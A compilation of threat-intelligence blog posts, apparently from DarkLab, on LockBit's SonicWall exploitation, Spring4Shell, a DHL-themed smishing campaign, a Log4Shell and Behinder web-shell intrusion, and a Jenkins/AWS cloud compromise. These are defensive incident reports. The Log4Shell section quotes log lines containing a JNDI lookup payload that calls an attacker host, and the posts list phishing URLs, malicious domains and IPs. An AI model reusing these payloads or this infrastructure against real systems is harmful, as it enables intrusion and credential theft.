CVE-2021-20016 – SonicWall SSLVPN SMA100 – SQL Injection Vulnerability – 3 November 2021 – A vulnerability in SMA100 build version 10.x allows a remote unauthenticated attacker to perform SQL query to access username, password and other session related information.
CVE-2021-20018 – SMA 100 Appliances – Stack-Based Buffer Overflow Vulnerability – 28 January 2022 – SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
CVE-2021-20028 – SonicWall SRA – SQL Injection Vulnerability – 28 March 2022 – SRA products contain an improper neutralisation of a SQL Command leading to SQL injection.
Table 1 – CISA known exploited vulnerabilities catalogue listing various critical SonicWall CVEs that were being exploited in the wild as of 2 April 2022

The ongoing evolution of TTPs allowed LockBit’s affiliates to become the most prolific ransomware actors in 2022. Between 1 January and 31 March 2022, the group claimed 223 victims on their dark web leak site, compared to Conti’s 125. This equates to more than one-third of all known ransomware incidents for Q1 2022. Put another way, over the same period LockBit’s affiliates claimed almost 10 percent more victims than the other 24 known ransomware groups combined (223 compared to 164). LockBit’s reported activity has also increased over the course of the first three months of 2022: the gang claimed 112 victims in March, while it published details of 111 companies in the previous two months combined. This suggests an ongoing trend, highlighting that LockBit will likely remain the most active ransomware-as-a-service offering for the coming months.

Figure 4 – Number of victims published on ransomware dark web leak sites between 1 January 2022 and 31 March 2022

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. At least 100 organisations in Hong Kong and Macau are potentially at immediate risk, and we foresee that, if left unpatched, this vulnerability poses a threat that adversaries may exploit to gain unauthorised access. We will continue to monitor the situation and assist organisations as needed. In the next blog post, we will also share further details on the TTPs leveraged by LockBit affiliates from our recent incident response experience, with reference to the MITRE ATT&CK Framework, so that organisations can better prevent and detect malicious activities related to this RaaS group.

Recommendations

For organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN, we recommend taking the following actions immediately, in this order:

  • Upgrade legacy SRA SSLVPN device(s) running firmware 8.x, given they are not supported by SonicWall; apply patches to the impacted versions of the 9.x or 10.x firmware.
  • Reset the Active Directory credentials of all user accounts that had previously authenticated via the SonicWall SRA SSLVPN. In particular, the Active Directory credentials tied to the SonicWall SRA device for authentication purposes should be changed.
  • Re-bind users’ second authentication factor (e.g., Google or Microsoft Authenticator app) with an updated TOTP, and ensure that users store their newly generated backup codes securely.[11]
  • Review the privileges granted to the Active Directory account tied to the SonicWall SRA device for user authentication purposes, and remove excess permissions where possible to adhere to the principle of least privilege. In general, Domain Administrator privilege should not be used.
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforcement of network segmentation to tighten access to key servers).

Meanwhile, defending against undisclosed exploits is extremely challenging, but not impossible if organisations adopt a defence-in-depth approach. The following guiding principles should be observed:

  • Require multi-factor authentication for all services to the extent possible, especially on external remote services.
  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically:
    • Maintain regular cybersecurity patching hygiene practices, including a robust baseline that patches known exploited vulnerabilities and aims to reduce the known attack surface.
    • Leverage cyber threat intelligence to prioritise the remediation scale and timeline on a risk-based approach, through the incorporation of indications and warnings regarding trending threats per available proof-of-concept code, active exploitation by threat actors, and Darknet chatter.
  • Maintain “tertiary” offline backups (i.e., a tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be on top of your existing secondary data backups, which should adopt security best practices, in particular network segmentation from your production and/or primary site.
  • Develop and regularly test the business continuity plan, ensuring that the entire backup, restoration and recovery lifecycle is drilled so that the organisation’s operations are not severely interrupted.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Impact: Data Encrypted for Impact (T1486)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

Indicator – Type
7fcb724c6f5c392525e287c0728dbeb0 – MD5
adead34f060586f85114cd5222e8b3a277d563bd – SHA-1
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7 – SHA-256
LockBit_9C11F98C309ECD01.exe – Executable File
.lockbit – Encrypted Files Extension
91.219.212[.]214 – IPv4 Address
5.206.224[.]246 – IPv4 Address
51.91.221[.]111 – IPv4 Address
213.186.33[.]5 – IPv4 Address
194.195.91[.]29 – IPv4 Address

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Thousands of organisations in Hong Kong and Macau impacted by Spring Core Remote Code Execution Vulnerability

Impacted organisations include financial services and critical infrastructure providers

On 29 March 2022, security researchers posted a now-removed screenshot to Twitter purporting to show a trivially exploited unauthenticated remote code execution (RCE) vulnerability in the Spring Framework, one of the most popular Java frameworks in use globally.[1] While the screenshot did not include a proof of concept or public details, proofs of concept dubbed “SpringShell” or “Spring4Shell” have emerged since 30 March 2022 and have been validated by DarkLab to be working exploits.[2]

The Spring Framework is among the most widely used lightweight open source frameworks for Java, as a result of a design philosophy that lets developers focus on business logic while simplifying the development cycle of Java enterprise applications.[3] Given its widespread use globally, and the general nature of the vulnerability, such that there may be unknown and additional ways of exploiting it, the impact of this vulnerability is compounded significantly and would be in excess of the impact observed for infamous vulnerabilities such as Log4Shell (CVE-2021-44228).

Technical Analysis

Based on analysis of consolidated data sources and our own technical analysis, DarkLab has been able to recreate the attack in a simulated environment. In order to exploit this vulnerability, an unauthenticated attacker must send a crafted HTTP request that triggers the framework’s parameter binding functions to achieve an arbitrary file write, through calls to specific Java ‘classLoader’/’pipeline’ functions. It is likely that the Spring Framework does not handle these calls properly, allowing a JSP web shell to be written to the root directory of the server, which can then be interacted with for unauthenticated remote code execution.

Figure 1 – redacted screenshot of successful simulated exploitation of RCE vulnerability that landed us a JSP web shell at the backend server

DarkLab has been actively performing discovery using our proprietary PoC since 30 March 2022. As a result of scanning all external-facing applications in Hong Kong and Macau, we observed that thousands of organisations – including financial services and critical infrastructure providers – are potentially vulnerable to the unauthenticated RCE vulnerability. At the time of writing, the scope of impacted organisations and the broader implications of exploitation are still being estimated and not fully known, as exploitability depends on whether particular functions are used within the Spring application.[4] The general nature of the vulnerability implies there may be other, still undiscovered methods to exploit it.

Probability of Exploitation by Threat Actors

Given that this is an unauthenticated RCE vulnerability in the widely-adopted Spring Framework, it is likely that it will present an attractive exploit for a variety of threat actors to weaponize and add to their arsenal for the purpose of obtaining initial access to unsuspecting victims’ systems.

Per DarkLab’s Deep and Dark Web monitoring, we observed on 29 March 2022 that English-speaking threat actors had exchanged messages via Telegram requesting working exploit code. While we are unable to ascertain with confidence whether they obtained this information through that exchange, we observed clear intent from these threat actors to leverage the unauthenticated RCE vulnerability to perform malicious activities against a specific range of targets. This includes exfiltrating sensitive personally identifiable information from South Asian state-owned enterprises, which suggests that these threat actors have a more targeted mindset and are capable of directing their attention to the observed vulnerable organisations in Hong Kong and Macau should it align with their objectives.

While there has not been active exploitation in the wild for Spring4Shell, we posit that threat actors of various objectives – ranging from espionage to financial motivation – will continue to invest resources to explore how best to weaponise the vulnerability to achieve their goals. DarkLab will continue to monitor the Deep and Dark Web for more insights on their innovations and targeting and provide updates as necessary.

Conclusion

In summary, this unauthenticated RCE vulnerability in the widely-adopted Spring Core makes it an attractive proposition for threat actors of all profiles and motivations. In particular, the general nature of the vulnerability implies there may be other ways to exploit it. As a result, we expect threat actors of all motivations will invest resources to innovate new techniques; until then, detection opportunities will remain limited. This implies that teams should first rely on their defense-in-depth security controls to mitigate the known risks, while continuing to track the status of this vulnerability regarding preventive and detective controls as they become publicly available.

Recommendations

Organisations using affected versions 5.3.x should upgrade to 5.3.18+, while versions 5.2.x should upgrade to 5.2.20+. However, there are other workaround solutions for applications that cannot upgrade to the above versions as listed on the Spring blog post.[5]

From a detection perspective, exploitation requests abuse Spring’s data binding to walk from a bound object’s class property into the ClassLoader, so the request parameter names themselves carry the traversal (the public proof-of-concept uses a parameter name beginning with class.module.classLoader). As such, filtering request parameter names for strings such as “class.“, “Class.“, “.class.“, and “.Class.” may detect exploitation attempts. Two caveats apply: the match should be performed on URL-decoded parameter names, since percent-encoding a single character in the name bypasses a raw-string filter, and plain substring matching will also hit legitimate property names (e.g. subclass.name), so start in log-only mode before blocking.

In addition, we strongly urge our clients to consider the following:

  • Review their application stack (Spring Framework version, JDK version, and how each application is packaged and deployed) to ascertain the scope of impact and prioritise patch deployment.
  • Monitor the official Spring vulnerability report [6] or Git repository for further updates to the patch releases and apply accordingly.[7]
  • Leverage cyber threat intelligence to monitor for further updates to the threat landscape as a result of new information pertaining to the unauthenticated RCE vulnerability.

MITRE ATT&CK TTPs Leveraged

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: Exploitation for Client Execution (T1203)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Smells SMiShy to me…

Macau SMS Phishing Unveils Threat Actor Close to Home

On 2 March 2022, DarkLab observed SMS phishing (smishing) activity targeting mobile users in Macau. The message masqueraded as a notification from the courier service DHL about a package delivery to the victim. The intended purpose was to steal victims’ credentials, personally identifiable information (PII), and credit card details.

Smishing campaigns that fraudulently use the DHL brand are far from uncommon.[1] Indeed, the Macau Polícia Judiciária issued a notice on 24 February 2022 warning citizens about fraudsters posing as courier companies to trick victims into providing their personal information.[2]

However, we were interested in this case as the threat actor behind it had also registered several fake domains masquerading as other reputable companies in Hong Kong and Singapore, such as Hongkong Post and Singapore Post. While we are used to phishing and smishing campaigns globally, when this happens in our virtual backyard it draws our attention as it can pose a real threat to users in Hong Kong, Macau, and Singapore.

Smishing Incident in Macau

The initial malicious SMS message came from a sender named INFO. Recipients are requested to click the provided hyperlink to reschedule the package pick-up date and time as the previous attempt was not delivered successfully.

Figure 1 – Initial SMS phishing message sent to the victim
Figure 2 – Image displaying the fraudulent delivery status

Once the victim opens the link, a page imitating DHL Express Hong Kong displays a phony delivery scheduling form with free-text fields the recipient is supposed to complete to schedule a delivery time. Information requested includes the user’s full name, contact number, residential address, city, and postal code.

Figure 3 – Image of the phony page prompting the victim to input their personal details

After inputting the personal information and clicking the submit button, the victim is redirected to another page that requires them to select their preferred delivery option.

Figure 4 – fraudulent DHL HK page asking victims to proceed to the payment card page

Upon selecting the preferred delivery option, the fraudulent DHL HK site requests that the victim input financial information, including name, credit card number, expiration date, and CVV. Once in possession of users’ payment card details, criminals can resell them online or commit card fraud themselves.

Figure 5 – Final page designed to capture the victims’ credit card details

Something Smelt Smishy…

The risk of smishing has increased at an alarming rate as a result of the Covid-19 pandemic. While this is not entirely a new trend, we observed that the messages are becoming increasingly deceptive as they look to trick victims into providing their personal information.

What caught our attention was that the URL within the smishing text redirected users to hongkong-post[.]net/918srx, which resolved to a Russian IP address – 31[.]28[.]27[.]151 – hosting the fake DHL site. The same IP address also hosted the domain dhl-post[.]hk. Both malicious domains and their associated SSL certificates were created after 28 February 2022, just a few days before the beginning of the smishing campaign.

Additionally, hongkong-post[.]net had mail exchanger (MX) records, which suggested the threat actors’ intent to send and/or receive emails.[3] We also saw MX records for another domain, singapore-post[.]com, hosted on the same IP address and created on 7 March 2022. Overall, the existence of young domains with MX records mimicking legitimate brands is a strong indication of likely phishing intent, which security teams should be monitoring for.
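The following is an added example, not from the original post, of how the young-domain-plus-MX heuristic described above can be turned into a triage score for a monitoring feed. The brand keyword list, the allowlist of legitimate domains, the creation dates of the legitimate and hypothetical domains, and the MX flag on dhl-post[.]hk are constructed assumptions, and the scoring weights are illustrative. It also catches one-character typosquats (aididas against adidas) by edit distance, which goes slightly beyond the plain brand-name check in the text.

```python
from datetime import date

# Constructed brand list and allowlist; a deployment would load the organisation's own.
BRAND_KEYWORDS = ["dhl", "hongkongpost", "singaporepost", "adidas"]
ALLOWLIST = {"dhl.com", "hongkongpost.hk", "singpost.com", "adidas.com.hk"}
YOUNG_DAYS = 30
WEIGHTS = {"brand": 50, "young": 20, "mx": 20}   # illustrative weights


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance, used to spot one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def matched_brand(domain: str):
    """Return the brand keyword a domain imitates, or None."""
    for label in domain.lower().split("."):
        squashed = label.replace("-", "")        # hongkong-post -> hongkongpost
        for kw in BRAND_KEYWORDS:
            if kw in squashed:
                return kw
            # Fuzzy match only for keywords long enough to avoid noise on short labels
            if len(kw) >= 5 and levenshtein(squashed, kw) <= 1:
                return kw
    return None


def score_domain(record: dict, as_of: date) -> dict:
    """record = {'domain', 'created' (date), 'has_mx' (bool)}."""
    domain = record["domain"]
    if domain in ALLOWLIST:
        return {"domain": domain, "score": 0, "risk": "allowlisted", "brand": None}
    brand = matched_brand(domain)
    score = 0
    if brand:
        score += WEIGHTS["brand"]
    if (as_of - record["created"]).days < YOUNG_DAYS:
        score += WEIGHTS["young"]
    if record["has_mx"]:
        score += WEIGHTS["mx"]
    risk = "high" if score >= 80 else "medium" if score >= 50 else "low"
    return {"domain": domain, "score": score, "risk": risk, "brand": brand}


def triage(records, as_of: date):
    """Score every record and return them highest-risk first."""
    return sorted((score_domain(r, as_of) for r in records), key=lambda r: -r["score"])


# Constructed feed as of the date in the text; creation dates are approximations.
AS_OF = date(2022, 3, 8)
SAMPLE_RECORDS = [
    {"domain": "hongkong-post.net", "created": date(2022, 2, 28), "has_mx": True},
    {"domain": "singapore-post.com", "created": date(2022, 3, 7), "has_mx": True},
    {"domain": "dhl-post.hk", "created": date(2022, 2, 28), "has_mx": False},
    {"domain": "aididas.com.hk", "created": date(2022, 3, 4), "has_mx": False},
    {"domain": "hongkongpost.hk", "created": date(1998, 1, 1), "has_mx": True},   # legitimate
    {"domain": "example-corp.com", "created": date(2022, 3, 1), "has_mx": True},  # young, no brand
]

if __name__ == "__main__":
    for result in triage(SAMPLE_RECORDS, AS_OF):
        print(f"{result['risk']:12s} {result['score']:3d} {result['domain']} (brand: {result['brand']})")
```

The brand-match weight dominates on purpose: a young domain with MX records but no brand resemblance is common and stays at "low", whereas a brand look-alike registered in the last month is worth an analyst's time even before MX records appear.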

A historical WHOIS lookup for the domains revealed that the registrar is NiceNIC INTERNATIONAL GROUP CO., LIMITED (NiceNIC.NET), based in Hong Kong.[4] Pivoting on the registrar name and NiceNIC.NET’s Chinese company name “耐思尼克國際集團有限公司”, we observed 21 additional domains associated with this registrar as of 8 March 2022. At least four of the domains (xjam[.]hk, canadahq[.]hk, kaddafi[.]hk, and aij[.]hk) were flagged by security scanners as likely malicious. There were also newly registered domains (aididas[.]com[.]hk) not yet flagged by security scanners that strongly resembled fraudulent websites.

Meanwhile, we also observed that canadahq[.]hk had historical resolutions to a known-bad Russian IP address, 185[.]178[.]208[.]186, which hosted files delivering the Trojan “Win32.Trojan.Raasj.Auto”. This Trojan was first observed in 2017 per various open source threat exchange platforms[5], and several web posts describe its impact on victims.

One post describes the Trojan as spyware that steals sensitive information such as credit card details and passwords for resale.[6] Another links a modified variant to the “Trojan-Ransom.Win32.Shade.Ino” ransomware, which cybercriminals deliver via phishing emails: it encrypts documents on the hard drive and prevents normal access to the victim’s workstation, leaving a ransom note on the local drive that demands payment for decryption.[7] A third post notes that “Win32.Trojan.Raasj.Auto” hijacks the victim’s web browser, causing redirection issues and degrading overall system and network performance.[8]

Overall, the links to relatively low-sophistication malware suggest a financially motivated campaign spanning multiple years that has only recently turned its focus to Hong Kong and South East Asian targets.

Figure 6 – Pivoting out from 耐思尼克國際集團有限公司 to identify further known-bad malicious domains and IP addresses, along with the Trojan “Win32.Trojan.Raasj.Auto”

Conclusion

Through a Macau smishing campaign, we were able to uncover a wider campaign targeting Hong Kong, Macau, and Singapore, involving a network of malicious Hong Kong domains registered through the same local registrar. One domain had a resolution history to a Russia-based IP address reportedly linked to Trojans used since at least 2017, suggesting the address was likely rented by, or associated with, multiple cybercriminal threat actors. Our assessment is reinforced by the fact that the domains used for smishing, dhl-post[.]hk and hongkong-post[.]net, were hosted on a Russian server, a relatively rare occurrence for Hong Kong-themed domains.

Recommendations

While phishing and smishing abusing legitimate brands will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Organisations should update their email security solution and network devices (including external firewalls and web proxies) to detect and block inbound/outbound connections involving the known-bad domains and IP addresses listed in this post.
  • Users should remain wary of the legitimacy of webpages and their branding and, if in doubt, navigate to the brand’s official website directly rather than following a shortened link. Impersonated companies should issue circulars and alerts as necessary when impersonation attempts are detected.
  • Organisations should monitor newly registered domains and alert on potentially suspicious ones for further action. This task is typically conducted by our Security Operations Centre for subscription clients. We have already informed both DHL and Hongkong Post so they can investigate and, if necessary, pursue takedown of the fake domains dhl-post[.]hk and hongkong-post[.]net.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning domains that impersonate legitimate brands, and should regularly review the activity of those domains to ensure they are used for ethical and non-malicious purposes.

MITRE ATT&CK TTPs Leveraged

  • Initial Access: Phishing (T1566)
  • Initial Access: Phishing: Spearphishing Link (T1566.001)
  • Execution: User Execution (T1204)
  • Credential Access: Input Capture – Web Portal Capture (T1056.003)
  • Collection: Input Capture (T1056)
  • Collection: Browser Session Hijacking (T1185)
  • Exfiltration: Automated Exfiltration (T1020)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Account Access Removal (T1531)
  • Impact: Endpoint Denial of Service (T1499)

Indicators of Compromise (IOCs)

• hxxps://hongkong-post[.]net/e/authID=UEjJc/tracking.php?sessionid=4g3ihd1ej09+6b+27fc58arSZF+27+5p9Ba8+D6Y+Gg3ok+4+1uIEOgCLfMSPmNKwbHwTAaX+J42951997505
• dhl-post[.]hk
• hongkong-post[.]net
• singapore-post[.]com
• xjam[.]hk
• canadahq[.]hk
• kaddafi[.]hk
• aij[.]hk
• aididas[.]com[.]hk
• 31[.]28[.]27[.]151
• 185[.]178[.]208[.]186

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

A look Behinder the scene

Popular web shell exploited after Log4Shell for data theft

DarkLab recently responded to an incident affecting a Hong Kong organisation in the retail sector. Threat actors exploited the vulnerability CVE-2021-44228 in the Apache Log4j library, also known as Log4Shell, as the initial infection vector. While we have observed multiple attempted exploitations of Log4Shell against our Managed Security Service clients since its public disclosure on 10 December 2021, this was the first instance in which we saw Log4Shell used in a prolonged network intrusion whose aim was not the typical crypto-mining or ransomware deployment for financial gain.

After initial access via Log4Shell, the actor dropped the Behinder web shell on the victim’s public-facing web servers. They exploited this access sporadically over a period of 51 days to retrieve additional information from backend database servers, which led to an increase in network activity and their subsequent discovery.

Initial access and web shell deployment  

Log4Shell is a vulnerability in Apache Log4j 2, a popular Java logging library. It allows a remote attacker to execute arbitrary code and take control of a system running a vulnerable version of Log4j 2 by causing the application to log a crafted string containing a JNDI lookup, which the library resolves by fetching a payload from an attacker-controlled server.

In this instance, we observed that the adversary manually probed the login page of one of the victim’s public-facing web servers to identify an entry point. The adversary spent several hours repeatedly interacting with the vulnerable webpage. Such prolonged interaction with the identified target suggests the attackers were not just running automated scripts, as many opportunistic threat actors do, but had a degree of interest in compromising this particular victim.

# Entry in Nginx
x.x.x.x - - [1/Jan/2022:08:00:00 +0000] "POST /login/logincheck HTTP/1.1" 302 0 "https://www.victim.com/victim/login" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" "x.x.x.x"

# Corresponding entry in Apache Log4j log
INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: Invalid id '${jndi:rmi://x.x.x.x:1099/oHg5SJ}'
INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: Invalid id '${jndi:rmi://x.x.x.x:1099/oHg5SJ}'

Fig 1 – log sample showing threat actors’ exploitation attempt. The sample has been sanitised to maintain the victim’s anonymity.

Once they had successfully exploited Log4Shell, they dropped the Behinder web shell (or “冰蝎”). Behinder is a versatile, multi-platform web shell created by a Chinese-speaking developer and popular within the hacking community in the same country. This web shell encrypts its command and control (C2) traffic with AES, which helped the threat actor maintain stealth and persistence in the victim’s environment.

Fig 2 – example of Behinder web shell’s user interface, likely used by the attacker to interact with the victim’s environment

The threat actor then used the web shell to enumerate the internal system and obtained the application credentials for the backend application database. Through the web shell they issued search queries against this database using terms that revealed their interest in customer data, such as customers’ names, email addresses, and residential addresses. Limited log availability did not allow us to determine the amount and nature of data accessed and exfiltrated.

The intruders interacted with the compromised servers via throwaway infrastructure. They used Vultr virtual private servers (VPS) hosted in South Korea for several consecutive days, followed by VPS hosted in Japan during the subsequent spikes in network activity. Adversaries typically rent VPS from providers such as Vultr to host their C2 servers while masking their true source IP addresses, preventing security researchers from easily tracing and linking their infrastructure to previously known intrusions.

Who is Behinder the intrusion?  

We do not have enough evidence to confidently attribute the intrusion to a known threat actor group. The large amount of customers’ personally identifiable information the victim held would have been of interest to financially and politically motivated threat actors alike.

However, the use of the Behinder web shell strongly suggests a Chinese-speaking threat actor. We also noted that a recent open source paper on the Earth Lusca group describes the actor as using Vultr VPS infrastructure and dropping Behinder, both of which match our observed activity. Notably, Earth Lusca has also previously targeted Hong Kong organisations. However, this allegedly state-sponsored group routinely uses malware such as Winnti and Cobalt Strike, neither of which we saw in this incident. This, and the relatively generic TTPs observed, prevents a confident attribution assessment.

Recommendations

  • Echoing our 2022 predictions advice, organisations should profile their attack surface to understand the services exposed, technologies used, and known vulnerabilities. Patching programmes should enable threat-based prioritisation of missing security patches and facilitate rapid deployment of critical security patches within aggressive timeframes.
  • Build a robust enterprise security architecture with layered defences to address potential security risks to critical assets (i.e., data, infrastructure, applications).
  • Enable security audit logs to ensure maximum visibility for existing security monitoring. In particular, ensure that log retention periods are sufficient to support after-the-fact investigations of potential incidents.
  • Implement specific mitigations against Log4Shell and related Log4j vulnerabilities, including blocking unneeded outbound TCP and UDP traffic from application servers: the JNDI lookup fetches its payload from an attacker-controlled LDAP or RMI server (port 1099 in the log sample above), so default-deny egress filtering removes the callback path even where patching lags.

MITRE ATT&CK TTPs Leveraged

  • Reconnaissance: Active Scanning (T1595)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Network Service Scanning (T1046)
  • Collection: Data from Local System (T1005)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)
  • Command and Control: Encrypted Channel – Symmetric Cryptography (T1573.001)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)

Indicators of Compromise (IOCs)

Feel free to contact us at [threatintel at darklab dot hk] for the full set of Indicators of Compromise (IOCs).

What to expect in 2022

We do not have a crystal ball to predict the future. However, we have plenty of experience in researching, responding, and mitigating cyber threats for our clients. The last eighteen months saw a dramatic evolution of the cyber security challenges companies face. Based on what we are observing in the threat landscape and the conversations we are having with industry leaders across sectors, here we outline what DarkLab cyber threat analysts assess will be some of the most relevant issues in 2022. 

Ransomware profits will ensure ongoing exploitation by lesser-known gangs 

Human operated ransomware with a double extortion tactic exploded in 2020, kept growing in 2021, and we expect it to continue to pose a high threat to organisations in 2022. Our analysis of ransomware groups’ posts on the darkweb show no sign of the underground industry slowing down.  

What we expect to change is criminals’ branding tactics. Well-known ransomware-as-a-service outfits like BlackMatter and REvil exploited their fame to attract affiliates and pressure victims into meeting ransom demands. However, their high profile attracted law enforcement attention, including in their home countries such as Russia, and led to these groups’ downfall. A logical reaction will likely see cybercriminals avoiding the same mistakes and maintaining a lower profile. Expect a larger number of smaller ransomware gangs in 2022.

Increased threat to cryptocurrency businesses  

While extortion has been the main profitable enterprise for cybercriminals in 2021, the profits will likely be reinvested in diversifying operations. Sophisticated groups like APT38 and individual hackers have in 2021 shown the potential profitability of targeting cryptocurrency exchanges and start-ups. Laundering millions of dollars worth of cryptocurrency is, for now at least, easier for criminals than to move large sums across the traditional financial system.  

As more and larger companies join the cryptocurrency business, and regulators still lag behind in imposing strict anti-fraud controls, there is a likely window of opportunity for criminals to exploit.  

Increased emphasis on private sector players in espionage operations 

Security researchers have warned of the threat posed by private sector spyware providers for a long time, although governments have only recently acted on it and imposed sanctions on some of the best known companies in the field. Israeli companies like NSO and Candiru are the highest profile names in a crowded industry providing many shades of services, from legitimate offensive toolsets to hack-for-hire operations, particularly in South and South East Asia.  

Even though governments worldwide have allegedly used private sector contractors in part of their offensive operations’ supply chain, last year’s increased media and government interest has put a spotlight on the issue. We expect more such campaigns to be highlighted in 2022.

Cloud supply chain is a potential single point of failure 

This prediction is, we truly hope, one that is not going to happen in the coming year, but rather a wider concern based on the dynamics we are observing in the IT industry and the cyber  threat landscape.  

Companies have moved to the cloud at an unprecedented speed during the last two years, and we are not seeing any deceleration on the horizon. However, increased data crunching in the cloud is not always met with a proportional increase in cloud security spending, best practices for which are still in their relative infancy.  

The number of trusted cloud vendors is also limited, with a few very large companies hosting most of the world’s data. Granted, companies like Microsoft, Amazon, Tencent and Alibaba have very good security teams and large security budgets. However, they also represent obvious central systems linked to many large organisations of interest to threat actors. Cloud outages, like those affecting a major US-based provider in December 2021, demonstrated the potential impact an attack on these companies could have on their customers.

The mass and rapid exploitation of Microsoft Exchange (ProxyShell) and Log4Shell also showed how adept threat actors are at weaponising vulnerabilities in widely used systems, and how these campaigns can paralyse security teams worldwide for weeks.

Finally, the most sophisticated threat actors, like APT29/Nobelium, have already demonstrated their intent and capability to exploit the cloud supply chain to gain access to high-profile targets. Our experience suggests that where sophisticated state-sponsored threat actors go, criminals eventually follow.

As such, the exploitation of cloud supply chain is likely among the highest threats to organisations in 2022 and beyond. Fortunately, much can be done to mitigate this threat by careful planning, including thorough application of zero-trust architecture and a shift-left approach to cloud devsecops. 

Recommendations to secure your 2022

We do not expect the challenges facing cyber security professionals in the coming year to be less ominous than those we just put behind us. Nonetheless, 2021 taught us plenty of useful lessons that can equip companies with the right strategies and tools to successfully mitigate the cyber threats we may face in 2022.

  • Comprehensive intrusion defense strategy: Our incident response and threat hunting experience suggests that a few best practices go a long way towards preventing most network intrusions:
    1. Attack surface hardening: enterprises should profile their attack surface, including exposed services and technologies used, and reduce their internet-exposed infrastructure.
    2. Identifying and protecting critical internal systems: threat actors, especially ransomware operators, actively look for systems in their victims’ networks that serve crucial functions and hold sensitive data (e.g. domain controllers, backup servers, file servers). Securing these systems reduces the impact of an intrusion and increases the likelihood of detection, while raising costs for attackers.
    3. Defending against lateral movement: most threat actors moving across a network rely on mechanisms that are relatively easy to disrupt with security restrictions, such as restricting Remote Desktop Protocol between user zones and disabling Windows Remote Management where it is not needed, among others.
    4. Protecting user accounts and privileged access: good credential protection and management are key to limiting credential theft and abuse. Measures should include multifactor authentication for remote or sensitive access, housekeeping of user and system accounts, and credential hardening for privileged accounts through managed service accounts (MSA) and the Protected Users group.
  • Risk-based security controls help overcome limitations: budget and people are finite. Prioritising them efficiently is crucial to a timely and effective security strategy. Companies should understand the intent and capabilities of the threats they are most likely to face. Assessing the likelihood of threats to critical systems and their potential impact is what makes a risk-based approach to security effective. By understanding the TTPs threat actors are most likely to use against your most important systems, you can prioritise the most urgent security controls.
  • Cloud security needs a strategy: as threats to the cloud mature, so should organisations’ strategies to secure their cloud systems. Cloud posture monitoring and cloud-specific MITRE ATT&CK detection use cases can help identify ongoing threats. Using existing blueprints for cloud deployment, a shift-left approach to DevSecOps, and greater automation through infrastructure-as-code are important preventive measures that also help alleviate the ongoing scarcity of cyber talent.

Trouble in Paradise

A case study of Cloud compromise

Many organisations are moving to cloud solutions to meet their hosting needs, but outsourcing workloads should not mean outsourcing security as well. The importance of securing the cloud was recently highlighted by the targeting of Microsoft Azure environments by Nobelium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably used stolen SAML token-signing certificates to forge tokens and pivot from on-premises identity infrastructure into the cloud, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also threaten companies’ cloud services. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team helped a South Asian client in the media sector remediate an incident involving breaches of multiple cloud environments, a case study we think can help organisations better plan secure implementations of their own cloud environments.

The incident originated from the likely exploitation of a known remote code execution vulnerability in a Jenkins instance (an open source automation server used for software builds and deployment). The server was hosted in an Amazon Web Services (AWS) environment and held a hardcoded root access key. With that key, the threat actor was able to roam the compromised environment undetected for four months. Log availability was an issue because CloudTrail logs were not retained, but we know that the threat actor created multiple IAM user accounts and accessed internal data, including data stored in S3 buckets, via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a staging point to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines as new EC2 instances in the compromised environment to scan and exploit external IP addresses, using t2.micro sizing to avoid spikes in usage and remain hidden. The attacker deployed these EC2 instances in a different AWS region from the one used by the victim, an anomaly we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

